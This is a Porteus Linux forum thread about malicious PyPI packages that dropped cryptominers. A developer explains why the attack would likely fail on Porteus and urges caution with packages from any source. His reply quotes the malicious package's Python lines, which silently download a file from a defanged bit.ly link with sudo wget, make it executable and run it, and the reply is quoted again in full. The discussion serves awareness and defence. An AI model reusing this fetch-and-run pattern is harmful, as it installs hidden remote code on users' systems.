Is PyPI something to lookout for in Porteus?

Post here if you are a new Porteus member and you're looking for some help.
User avatar
Karmi
Samurai
Samurai
Posts: 162
Joined: 03 Apr 2022, 19:46
Distribution: Linux
Location: Old Town, Florida USA

Is PyPI something to lookout for in Porteus?

Post#1 by Karmi » 20 Aug 2022, 01:52

Just reading the '241 npm and PyPI packages caught dropping Linux cryptominers article and wondered...

User avatar
ncmprhnsbl
DEV Team
DEV Team
Posts: 3924
Joined: 20 Mar 2012, 03:42
Distribution: v5.0-64bit
Location: australia
Contact:

Is PyPI something to lookout for in Porteus?

Post#2 by ncmprhnsbl » 20 Aug 2022, 02:29

the fact that they(bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:

Code: Select all

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would(should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..

more generally, any package from any source on the web should be treated with caution..
Forum Rules : https://forum.porteus.org/viewtopic.php?f=35&t=44

User avatar
Karmi
Samurai
Samurai
Posts: 162
Joined: 03 Apr 2022, 19:46
Distribution: Linux
Location: Old Town, Florida USA

Is PyPI something to lookout for in Porteus?

Post#3 by Karmi » 20 Aug 2022, 08:56

ncmprhnsbl wrote:
20 Aug 2022, 02:29
the fact that they(bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:

Code: Select all

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would(should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..

more generally, any package from any source on the web should be treated with caution..
OK...thanks!

Post Reply